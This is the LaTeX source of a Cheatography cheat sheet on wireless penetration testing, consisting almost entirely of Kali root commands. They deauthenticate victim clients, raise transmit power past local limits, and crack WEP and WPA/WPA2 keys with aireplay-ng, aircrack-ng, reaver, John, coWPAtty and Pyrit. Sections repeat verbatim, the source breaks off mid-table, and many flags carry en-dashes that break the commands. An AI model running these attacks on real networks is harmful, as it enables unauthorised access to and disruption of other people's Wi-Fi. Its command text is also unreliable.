\documentclass[10pt,a4paper]{article} % Packages \usepackage{fancyhdr} % For header and footer \usepackage{multicol} % Allows multicols in tables \usepackage{tabularx} % Intelligent column widths \usepackage{tabulary} % Used in header and footer \usepackage{hhline} % Border under tables \usepackage{graphicx} % For images \usepackage{xcolor} % For hex colours %\usepackage[utf8x]{inputenc} % For unicode character support \usepackage[T1]{fontenc} % Without this we get weird character replacements \usepackage{colortbl} % For coloured tables \usepackage{setspace} % For line height \usepackage{lastpage} % Needed for total page number \usepackage{seqsplit} % Splits long words. %\usepackage{opensans} % Can't make this work so far. Shame. Would be lovely. \usepackage[normalem]{ulem} % For underlining links % Most of the following are not required for the majority % of cheat sheets but are needed for some symbol support. \usepackage{amsmath} % Symbols \usepackage{MnSymbol} % Symbols \usepackage{wasysym} % Symbols %\usepackage[english,german,french,spanish,italian]{babel} % Languages % Document Info \author{kennedykan} \pdfinfo{ /Title (wireless-penetration-testing.pdf) /Creator (Cheatography) /Author (kennedykan) /Subject (Wireless Penetration Testing Cheat Sheet) } % Lengths and widths \addtolength{\textwidth}{6cm} \addtolength{\textheight}{-1cm} \addtolength{\hoffset}{-3cm} \addtolength{\voffset}{-2cm} \setlength{\tabcolsep}{0.2cm} % Space between columns \setlength{\headsep}{-12pt} % Reduce space between header and content \setlength{\headheight}{85pt} % If less, LaTeX automatically increases it \renewcommand{\footrulewidth}{0pt} % Remove footer line \renewcommand{\headrulewidth}{0pt} % Remove header line \renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit % This two commands together give roughly % the right line height in the tables \renewcommand{\arraystretch}{1.3} \onehalfspacing % Commands \newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour \newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols \newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns \newcommand{\tn}{\tabularnewline} % Required as custom column type in use % Font and Colours \definecolor{HeadBackground}{HTML}{333333} \definecolor{FootBackground}{HTML}{666666} \definecolor{TextColor}{HTML}{333333} \definecolor{DarkBackground}{HTML}{0368A3} \definecolor{LightBackground}{HTML}{EFF5F9} \renewcommand{\familydefault}{\sfdefault} \color{TextColor} % Header and Footer \pagestyle{fancy} \fancyhead{} % Set header to blank \fancyfoot{} % Set footer to blank \fancyhead[L]{ \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{C} \SetRowColor{DarkBackground} \vspace{-7pt} {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent \hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}} } \end{tabulary} \columnbreak \begin{tabulary}{11cm}{L} \vspace{-2pt}\large{\bf{\textcolor{DarkBackground}{\textrm{Wireless Penetration Testing Cheat Sheet}}}} \\ \normalsize{by \textcolor{DarkBackground}{kennedykan} via \textcolor{DarkBackground}{\uline{cheatography.com/70812/cs/17953/}}} \end{tabulary} \end{multicols}} \fancyfoot[L]{ \footnotesize \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{LL} \SetRowColor{FootBackground} \mymulticolumn{2}{p{5.377cm}}{\bf\textcolor{white}{Cheatographer}} \\ \vspace{-2pt}kennedykan \\ \uline{cheatography.com/kennedykan} \\ \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Cheat Sheet}} \\ \vspace{-2pt}Published 6th May, 2022.\\ Updated 17th October, 2020.\\ Page {\thepage} of \pageref{LastPage}. \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Sponsor}} \\ \SetRowColor{white} \vspace{-5pt} %\includegraphics[width=48px,height=48px]{dave.jpeg} Measure your website readability!\\ www.readability-score.com \end{tabulary} \end{multicols}} \begin{document} \raggedright \raggedcolumns % Set font size to small. Switch to any value % from this page to resize cheat sheet text: % www.emerson.emory.edu/services/latex/latex_169.html \footnotesize % Small font. \begin{multicols*}{3} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Wireless Penetration Testing Cheat Sheet}} \tn \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{\seqsplit{\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_} \newline % Row Count 1 (+ 1) WIRELESS ANTENNA \newline % Row Count 2 (+ 1) \seqsplit{\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_} \newline % Row Count 3 (+ 1) Kill Monitor Processes \newline % Row Count 4 (+ 1) root@kali:\textasciitilde{}\# airmon-ng check kill \newline % Row Count 5 (+ 1) Open the Monitor Mode \newline % Row Count 6 (+ 1) root@kali:\textasciitilde{}\# ifconfig wlan0 down \newline % Row Count 7 (+ 1) root@kali:\textasciitilde{}\# airmon-ng start wlan0 \newline % Row Count 8 (+ 1) \# if you get an error with airmon-ng command, try this ; \newline % Row Count 10 (+ 2) \# iwconfig wlan0 mode monitor \newline % Row Count 11 (+ 1) \# use wlan0 instead of mon0 \newline % Row Count 12 (+ 1) root@kali:\textasciitilde{}\# ifconfig wlan0 up \newline % Row Count 13 (+ 1) Increase Wi-Fi TX Power \newline % Row Count 14 (+ 1) root@kali:\textasciitilde{}\# iw reg set B0 \newline % Row Count 15 (+ 1) root@kali:\textasciitilde{}\# iwconfig wlan0 txpower \textless{}NmW|NdBm|off|auto\textgreater{} \newline % Row Count 17 (+ 2) \#txpower is 30 (generally) \newline % Row Count 18 (+ 1) \#txpower is depends your country, please googling \newline % Row Count 19 (+ 1) root@kali:\textasciitilde{}\# iwconfig \newline % Row Count 20 (+ 1) Change WiFi Channel \newline % Row Count 21 (+ 1) root@kali:\textasciitilde{}\# iwconfig wlan0 channel \textless{}SetChannel(1-14)\textgreater{} \newline % Row Count 23 (+ 2) \seqsplit{\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_} \newline % Row Count 24 (+ 1) FIND HIDDEN SSID \newline % Row Count 25 (+ 1) \seqsplit{\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_} \newline % Row Count 26 (+ 1) root@kali:\textasciitilde{}\# airmon-ng start wlan0 \newline % Row Count 27 (+ 1) root@kali:\textasciitilde{}\# airodump-ng –c \textless{}Channel\textgreater{} -{}-bssid \textless{}BSSID\textgreater{} mon0 \newline % Row Count 29 (+ 2) root@kali:\textasciitilde{}\# aireplay-ng -0 20 –a \textless{}BSSID\textgreater{} -c \textless{}VictimMac\textgreater{} mon0  \newline % Row Count 31 (+ 2) } \tn \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Wireless Penetration Testing Cheat Sheet (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{\seqsplit{\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_} \newline % Row Count 1 (+ 1) WEP CRACKING (via Client) \newline % Row Count 2 (+ 1) \seqsplit{\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_} \newline % Row Count 3 (+ 1) Method 1: ARP Request Replay Attack \newline % Row Count 4 (+ 1) root@kali:\textasciitilde{}\# airmon-ng start wlan0 \newline % Row Count 5 (+ 1) root@kali:\textasciitilde{}\# airodump-ng –c \textless{}AP\_Channel\textgreater{} -{}-bssid \textless{}BSSID\textgreater{} -w \textless{}FileName\textgreater{} mon0 \newline % Row Count 7 (+ 2) \#What's my mac? \newline % Row Count 8 (+ 1) root@kali:\textasciitilde{}\# macchanger -{}-show mon0 \newline % Row Count 9 (+ 1) root@kali:\textasciitilde{}\# aireplay-ng -3 –x 1000 –n 1000 –b \textless{}BSSID\textgreater{} -h \textless{}OurMac\textgreater{} mon0 \newline % Row Count 11 (+ 2) root@kali:\textasciitilde{}\# aircrack-ng –b \textless{}BSSID\textgreater{} \textless{}PCAP\_of\_FileName\textgreater{} \newline % Row Count 13 (+ 2) Method 2: Interactive Packet Replay Attack \newline % Row Count 14 (+ 1) root@kali:\textasciitilde{}\# airmon-ng start wlan0 \newline % Row Count 15 (+ 1) root@kali:\textasciitilde{}\# airodump-ng –c \textless{}AP\_Channel\textgreater{} -{}-bssid \textless{}BSSID\textgreater{} -w \textless{}FileName\textgreater{} mon0 \newline % Row Count 17 (+ 2) \#What's my mac? \newline % Row Count 18 (+ 1) root@kali:\textasciitilde{}\# macchanger -{}-show mon0 \newline % Row Count 19 (+ 1) root@kali:\textasciitilde{}\# aireplay-ng -1 0 -a \textless{}BSSID\textgreater{} -h \textless{}OurMac\textgreater{} -e \textless{}ESSID\textgreater{} mon0 \newline % Row Count 21 (+ 2) root@kali:\textasciitilde{}\# aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b \textless{}BSSID\textgreater{} -h \textless{}OurMac\textgreater{} mon0 \newline % Row Count 23 (+ 2) root@kali:\textasciitilde{}\# aircrack-ng –b \textless{}BSSID\textgreater{} \textless{}PCAP\_of\_FileName\textgreater{} \newline % Row Count 25 (+ 2) Method 3: SKA (Shared Key Authentication) Type Cracking \newline % Row Count 27 (+ 2) root@kali:\textasciitilde{}\# airmon-ng start wlan0 \newline % Row Count 28 (+ 1) root@kali:\textasciitilde{}\# airodump-ng –c \textless{}AP\_Channel\textgreater{} -{}-bssid \textless{}BSSID\textgreater{} -w \textless{}FileName\textgreater{} mon0 \newline % Row Count 30 (+ 2) } \tn \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Wireless Penetration Testing Cheat Sheet (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{root@kali:\textasciitilde{}\# aireplay-ng -0 10 –a \textless{}BSSID\textgreater{} -c \textless{}VictimMac\textgreater{} mon0 \newline % Row Count 2 (+ 2) root@kali:\textasciitilde{}\# aireplay-ng -1 0 –e \textless{}ESSID\textgreater{} -y \textless{}keystream file\textgreater{} -a \textless{}BSSID\textgreater{} -h \textless{}OurMac\textgreater{} mon0 \newline % Row Count 4 (+ 2) root@kali:\textasciitilde{}\# aireplay-ng -3 –b \textless{}BSSID\textgreater{} -h \textless{}FakedMac\textgreater{} mon0 \newline % Row Count 6 (+ 2) root@kali:\textasciitilde{}\# aireplay-ng –0 1 –a \textless{}BSSID\textgreater{} -h \textless{}FakedMac\textgreater{} mon0 \newline % Row Count 8 (+ 2) root@kali:\textasciitilde{}\# aircrack-ng \textless{}PCAP\_of\_FileName\textgreater{}% Row Count 9 (+ 1) } \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Wireless Penetration Testing Cheat Sheet}} \tn \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{\seqsplit{\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_} \newline % Row Count 1 (+ 1) WEP CRACKING (Clientless) \newline % Row Count 2 (+ 1) \seqsplit{\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_} \newline % Row Count 3 (+ 1) Method 1: Chop Chop Attack \newline % Row Count 4 (+ 1) root@kali:\textasciitilde{}\# airmon-ng start wlan0 \newline % Row Count 5 (+ 1) root@kali:\textasciitilde{}\# airodump-ng –c \textless{}AP\_Channel\textgreater{} -{}-bssid \textless{}BSSID\textgreater{} -w \textless{}FileName\textgreater{} mon0 \newline % Row Count 7 (+ 2) \#What's my mac? \newline % Row Count 8 (+ 1) root@kali:\textasciitilde{}\# macchanger -{}-show mon0 \newline % Row Count 9 (+ 1) root@kali:\textasciitilde{}\# aireplay-ng -1 0 –e \textless{}ESSID\textgreater{} -a \textless{}BSSID\textgreater{} -h \textless{}OurMac\textgreater{} mon0 \newline % Row Count 11 (+ 2) root@kali:\textasciitilde{}\# aireplay-ng -4 –b \textless{}BSSID\textgreater{} -h \textless{}OurMac\textgreater{} mon0 \newline % Row Count 13 (+ 2) \#Press 'y' ; \newline % Row Count 14 (+ 1) root@kali:\textasciitilde{}\# packetforge-ng -0 –a \textless{}BSSID\textgreater{} -h \textless{}OurMac\textgreater{} -k \textless{}SourceIP\textgreater{} -l \textless{}DestinationIP\textgreater{} -y \textless{}XOR\_PacketFile\textgreater{} -w \textless{}FileName2\textgreater{} \newline % Row Count 17 (+ 3) root@kali:\textasciitilde{}\# aireplay-ng -2 –r \textless{}FileName2\textgreater{} mon0 \newline % Row Count 18 (+ 1) root@kali:\textasciitilde{}\# aircrack-ng \textless{}PCAP\_of\_FileName\textgreater{} \newline % Row Count 19 (+ 1) Method 2: Fragmentation Attack \newline % Row Count 20 (+ 1) root@kali:\textasciitilde{}\# airmon-ng start wlan0 \newline % Row Count 21 (+ 1) root@kali:\textasciitilde{}\# airodump-ng –c \textless{}AP\_Channel\textgreater{} -{}-bssid \textless{}BSSID\textgreater{} -w \textless{}FileName\textgreater{} mon0 \newline % Row Count 23 (+ 2) \#What's my mac? \newline % Row Count 24 (+ 1) root@kali:\textasciitilde{}\# macchanger -{}-show mon0 \newline % Row Count 25 (+ 1) root@kali:\textasciitilde{}\# aireplay-ng -1 0 –e \textless{}ESSID\textgreater{} -a \textless{}BSSID\textgreater{} -h \textless{}OurMac\textgreater{} mon0 \newline % Row Count 27 (+ 2) root@kali:\textasciitilde{}\# aireplay-ng -5 –b\textless{}BSSID\textgreater{} -h \textless{} OurMac \textgreater{} mon0 \newline % Row Count 29 (+ 2) \#Press 'y' ; \newline % Row Count 30 (+ 1) } \tn \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Wireless Penetration Testing Cheat Sheet (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{root@kali:\textasciitilde{}\# packetforge-ng -0 –a \textless{}BSSID\textgreater{} -h \textless{} OurMac \textgreater{} -k \textless{}SourceIP\textgreater{} -l \textless{}DestinationIP\textgreater{} -y \textless{}XOR\_PacketFile\textgreater{} -w \textless{}FileName2\textgreater{} \newline % Row Count 3 (+ 3) root@kali:\textasciitilde{}\# aireplay-ng -2 –r \textless{}FileName2\textgreater{} mon0 \newline % Row Count 4 (+ 1) root@kali:\textasciitilde{}\# aircrack-ng \textless{}PCAP\_of\_FileName\textgreater{} \newline % Row Count 5 (+ 1)   \newline % Row Count 6 (+ 1) \seqsplit{\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_} \newline % Row Count 7 (+ 1) WPA / WPA2 CRACKING \newline % Row Count 8 (+ 1) \seqsplit{\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_} \newline % Row Count 9 (+ 1) Method 1: WPS Attack \newline % Row Count 10 (+ 1) root@kali:\textasciitilde{}\# airmon-ng start wlan0 \newline % Row Count 11 (+ 1) root@kali:\textasciitilde{}\# apt-get install reaver \newline % Row Count 12 (+ 1) root@kali:\textasciitilde{}\# wash –i mon0 \newline % Row Count 13 (+ 1) root@kali:\textasciitilde{}\# reaver –i mon0 –b \textless{}BSSID\textgreater{} -vv –S \newline % Row Count 15 (+ 2) \#or, Specific attack \newline % Row Count 16 (+ 1) root@kali:\textasciitilde{}\# reaver –i mon0 –c \textless{}Channel\textgreater{} -b \textless{}BSSID\textgreater{} -p \textless{}PinCode\textgreater{} -vv –S \newline % Row Count 18 (+ 2) Method 2: Dictionary Attack \newline % Row Count 19 (+ 1) root@kali:\textasciitilde{}\# airmon-ng start wlan0 \newline % Row Count 20 (+ 1) root@kali:\textasciitilde{}\# airodump-ng –c \textless{}AP\_Channel\textgreater{} -{}-bssid \textless{}BSSID\textgreater{} -w \textless{}FileName\textgreater{} mon0 \newline % Row Count 22 (+ 2) root@kali:\textasciitilde{}\# aireplay-ng -0 1 –a \textless{}BSSID\textgreater{} -c \textless{}VictimMac\textgreater{} mon0 \newline % Row Count 24 (+ 2) root@kali:\textasciitilde{}\# aircrack-ng –w \textless{}WordlistFile\textgreater{} -b \textless{}BSSID\textgreater{} \textless{}Handshaked\_PCAP\textgreater{} \newline % Row Count 26 (+ 2) Method 3: Crack with John The Ripper \newline % Row Count 27 (+ 1) root@kali:\textasciitilde{}\# airmon-ng start wlan0 \newline % Row Count 28 (+ 1) root@kali:\textasciitilde{}\# airodump-ng –c \textless{}Channel\textgreater{} -{}-bssid \textless{}BSSID\textgreater{} -w \textless{}FileName\textgreater{} mon0 \newline % Row Count 30 (+ 2) } \tn \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Wireless Penetration Testing Cheat Sheet (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{root@kali:\textasciitilde{}\# aireplay-ng -0 1 –a \textless{}BSSID\textgreater{} -c \textless{}VictimMac\textgreater{} mon0 \newline % Row Count 2 (+ 2) root@kali:\textasciitilde{}\# cd /pentest/passwords/john \newline % Row Count 3 (+ 1) root@kali:\textasciitilde{}\# ./john –wordlist=\textless{}Wordlist\textgreater{} -{}-rules –stdout|aircrack-ng -0 –e \textless{}ESSID\textgreater{} -w - \textless{}PCAP\_of\_FileName\textgreater{} \newline % Row Count 6 (+ 3) \#or \newline % Row Count 7 (+ 1) root@kali:\textasciitilde{}\# aircrack-ng \textless{}FileName\textgreater{}.cap -J \textless{}outFile\textgreater{} \newline % Row Count 9 (+ 2) root@kali:\textasciitilde{}\# hccap2john \textless{}outFile\textgreater{}.hccap \textgreater{} \textless{}JohnOutFile\textgreater{} \newline % Row Count 11 (+ 2) root@kali:\textasciitilde{}\# john \textless{}JohnOutFile\textgreater{} \newline % Row Count 12 (+ 1) Method 4: Crack with coWPAtty \newline % Row Count 13 (+ 1) root@kali:\textasciitilde{}\# airmon-ng start wlan0 \newline % Row Count 14 (+ 1) root@kali:\textasciitilde{}\# airodump-ng –c \textless{}Channel\textgreater{} -{}-bssid \textless{}BSSID\textgreater{} -w \textless{}FileName\textgreater{} mon0 \newline % Row Count 16 (+ 2) root@kali:\textasciitilde{}\# aireplay-ng -0 1 –a \textless{}BSSID\textgreater{} -c \textless{}VictimMac\textgreater{} mon0 \newline % Row Count 18 (+ 2) root@kali:\textasciitilde{}\# cowpatty –r \textless{}FileName\textgreater{} -f \textless{}Wordlist\textgreater{} -2 –s \textless{}SSID\textgreater{} \newline % Row Count 20 (+ 2) root@kali:\textasciitilde{}\# genpmk –s \textless{}SSID\textgreater{} –f \textless{}Wordlist\textgreater{} -d \textless{}HashesFileName\textgreater{} \newline % Row Count 22 (+ 2) root@kali:\textasciitilde{}\# cowpatty –r \textless{}PCAP\_of\_FileName\textgreater{} -d \textless{}HashesFileName\textgreater{} -2 –s \textless{}SSID\textgreater{} \newline % Row Count 24 (+ 2) Method 5: Crack with Pyrit \newline % Row Count 25 (+ 1) root@kali:\textasciitilde{}\# airmon-ng start wlan0 \newline % Row Count 26 (+ 1) root@kali:\textasciitilde{}\# airodump-ng –c \textless{}Channel\textgreater{} -{}-bssid \textless{}BSSID\textgreater{} -w \textless{}FileName\textgreater{} mon0 \newline % Row Count 28 (+ 2) root@kali:\textasciitilde{}\# aireplay-ng -0 1 –a \textless{}BSSID\textgreater{} -c \textless{}VictimMac\textgreater{} mon0 \newline % Row Count 30 (+ 2) } \tn \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Wireless Penetration Testing Cheat Sheet (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{root@kali:\textasciitilde{}\# pyrit –r\textless{}PCAP\_of\_FileName\textgreater{} -b \textless{}BSSID\textgreater{} -i \textless{}Wordlist\textgreater{} attack\_passthrough \newline % Row Count 2 (+ 2) root@kali:\textasciitilde{}\# pyrit –i \textless{}Wordlist\textgreater{} import\_passwords \newline % Row Count 4 (+ 2) root@kali:\textasciitilde{}\# pyrit –e \textless{}ESSID\textgreater{} create\_essid \newline % Row Count 5 (+ 1) root@kali:\textasciitilde{}\# pyrit batch \newline % Row Count 6 (+ 1) root@kali:\textasciitilde{}\# pyrit –r \textless{}PCAP\_of\_FileName\textgreater{} attack\_db \newline % Row Count 8 (+ 2) Method 6: Precomputed WPA Keys Database Attack \newline % Row Count 9 (+ 1) root@kali:\textasciitilde{}\# airmon-ng start wlan0 \newline % Row Count 10 (+ 1) root@kali:\textasciitilde{}\# airodump-ng –c \textless{}AP\_Channel\textgreater{} -{}-bssid \textless{}BSSID\textgreater{} -w \textless{}FileName\textgreater{} mon0 \newline % Row Count 12 (+ 2) root@kali:\textasciitilde{}\# aireplay-ng -0 1 –a \textless{}BSSID\textgreater{} -c \textless{}VictimMac\textgreater{} mon0 \newline % Row Count 14 (+ 2) root@kali:\textasciitilde{}\# kwrite ESSID.txt \newline % Row Count 15 (+ 1) root@kali:\textasciitilde{}\# airolib-ng NEW\_DB -{}-import essid ESSID.txt \newline % Row Count 17 (+ 2) root@kali:\textasciitilde{}\# airolib-ng NEW\_DB -{}-import passwd \textless{}DictionaryFile\textgreater{} \newline % Row Count 19 (+ 2) root@kali:\textasciitilde{}\# airolib-ng NEW\_DB -{}-clean all \newline % Row Count 20 (+ 1) root@kali:\textasciitilde{}\# airolib-ng NEW\_DB -{}-stats \newline % Row Count 21 (+ 1) root@kali:\textasciitilde{}\# airolib-ng NEW\_DB -{}-batch \newline % Row Count 22 (+ 1) root@kali:\textasciitilde{}\# airolib-ng NEW\_DB -{}-verify all \newline % Row Count 23 (+ 1) root@kali:\textasciitilde{}\# aircrack-ng –r NEW\_DB \textless{}Handshaked\_PCAP\textgreater{} % Row Count 25 (+ 2) } \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Wireless Penetration Testing Cheat Sheet}} \tn \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{\seqsplit{\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_} \newline % Row Count 1 (+ 1) WEP CRACKING (Clientless) \newline % Row Count 2 (+ 1) \seqsplit{\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_} \newline % Row Count 3 (+ 1) Method 1: Chop Chop Attack \newline % Row Count 4 (+ 1) root@kali:\textasciitilde{}\# airmon-ng start wlan0 \newline % Row Count 5 (+ 1) root@kali:\textasciitilde{}\# airodump-ng –c \textless{}AP\_Channel\textgreater{} -{}-bssid \textless{}BSSID\textgreater{} -w \textless{}FileName\textgreater{} mon0 \newline % Row Count 7 (+ 2) \#What's my mac? \newline % Row Count 8 (+ 1) root@kali:\textasciitilde{}\# macchanger -{}-show mon0 \newline % Row Count 9 (+ 1) root@kali:\textasciitilde{}\# aireplay-ng -1 0 –e \textless{}ESSID\textgreater{} -a \textless{}BSSID\textgreater{} -h \textless{}OurMac\textgreater{} mon0 \newline % Row Count 11 (+ 2) root@kali:\textasciitilde{}\# aireplay-ng -4 –b \textless{}BSSID\textgreater{} -h \textless{}OurMac\textgreater{} mon0 \newline % Row Count 13 (+ 2) \#Press 'y' ; \newline % Row Count 14 (+ 1) root@kali:\textasciitilde{}\# packetforge-ng -0 –a \textless{}BSSID\textgreater{} -h \textless{}OurMac\textgreater{} -k \textless{}SourceIP\textgreater{} -l \textless{}DestinationIP\textgreater{} -y \textless{}XOR\_PacketFile\textgreater{} -w \textless{}FileName2\textgreater{} \newline % Row Count 17 (+ 3) root@kali:\textasciitilde{}\# aireplay-ng -2 –r \textless{}FileName2\textgreater{} mon0 \newline % Row Count 18 (+ 1) root@kali:\textasciitilde{}\# aircrack-ng \textless{}PCAP\_of\_FileName\textgreater{} \newline % Row Count 19 (+ 1) Method 2: Fragmentation Attack \newline % Row Count 20 (+ 1) root@kali:\textasciitilde{}\# airmon-ng start wlan0 \newline % Row Count 21 (+ 1) root@kali:\textasciitilde{}\# airodump-ng –c \textless{}AP\_Channel\textgreater{} -{}-bssid \textless{}BSSID\textgreater{} -w \textless{}FileName\textgreater{} mon0 \newline % Row Count 23 (+ 2) \#What's my mac? \newline % Row Count 24 (+ 1) root@kali:\textasciitilde{}\# macchanger -{}-show mon0 \newline % Row Count 25 (+ 1) root@kali:\textasciitilde{}\# aireplay-ng -1 0 –e \textless{}ESSID\textgreater{} -a \textless{}BSSID\textgreater{} -h \textless{}OurMac\textgreater{} mon0 \newline % Row Count 27 (+ 2) root@kali:\textasciitilde{}\# aireplay-ng -5 –b\textless{}BSSID\textgreater{} -h \textless{} OurMac \textgreater{} mon0 \newline % Row Count 29 (+ 2) \#Press 'y' ; \newline % Row Count 30 (+ 1) } \tn \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Wireless Penetration Testing Cheat Sheet (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{root@kali:\textasciitilde{}\# packetforge-ng -0 –a \textless{}BSSID\textgreater{} -h \textless{} OurMac \textgreater{} -k \textless{}SourceIP\textgreater{} -l \textless{}DestinationIP\textgreater{} -y \textless{}XOR\_PacketFile\textgreater{} -w \textless{}FileName2\textgreater{} \newline % Row Count 3 (+ 3) root@kali:\textasciitilde{}\# aireplay-ng -2 –r \textless{}FileName2\textgreater{} mon0 \newline % Row Count 4 (+ 1) root@kali:\textasciitilde{}\# aircrack-ng \textless{}PCAP\_of\_FileName\textgreater{} \newline % Row Count 5 (+ 1)   \newline % Row Count 6 (+ 1) \seqsplit{\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_} \newline % Row Count 7 (+ 1) WPA / WPA2 CRACKING \newline % Row Count 8 (+ 1) \seqsplit{\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_} \newline % Row Count 9 (+ 1) Method 1: WPS Attack \newline % Row Count 10 (+ 1) root@kali:\textasciitilde{}\# airmon-ng start wlan0 \newline % Row Count 11 (+ 1) root@kali:\textasciitilde{}\# apt-get install reaver \newline % Row Count 12 (+ 1) root@kali:\textasciitilde{}\# wash –i mon0 \newline % Row Count 13 (+ 1) root@kali:\textasciitilde{}\# reaver –i mon0 –b \textless{}BSSID\textgreater{} -vv –S \newline % Row Count 15 (+ 2) \#or, Specific attack \newline % Row Count 16 (+ 1) root@kali:\textasciitilde{}\# reaver –i mon0 –c \textless{}Channel\textgreater{} -b \textless{}BSSID\textgreater{} -p \textless{}PinCode\textgreater{} -vv –S \newline % Row Count 18 (+ 2) Method 2: Dictionary Attack \newline % Row Count 19 (+ 1) root@kali:\textasciitilde{}\# airmon-ng start wlan0 \newline % Row Count 20 (+ 1) root@kali:\textasciitilde{}\# airodump-ng –c \textless{}AP\_Channel\textgreater{} -{}-bssid \textless{}BSSID\textgreater{} -w \textless{}FileName\textgreater{} mon0 \newline % Row Count 22 (+ 2) root@kali:\textasciitilde{}\# aireplay-ng -0 1 –a \textless{}BSSID\textgreater{} -c \textless{}VictimMac\textgreater{} mon0 \newline % Row Count 24 (+ 2) root@kali:\textasciitilde{}\# aircrack-ng –w \textless{}WordlistFile\textgreater{} -b \textless{}BSSID\textgreater{} \textless{}Handshaked\_PCAP\textgreater{} \newline % Row Count 26 (+ 2) Method 3: Crack with John The Ripper \newline % Row Count 27 (+ 1) root@kali:\textasciitilde{}\# airmon-ng start wlan0 \newline % Row Count 28 (+ 1) root@kali:\textasciitilde{}\# airodump-ng –c \textless{}Channel\textgreater{} -{}-bssid \textless{}BSSID\textgreater{} -w \textless{}FileName\textgreater{} mon0 \newline % Row Count 30 (+ 2) } \tn \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} 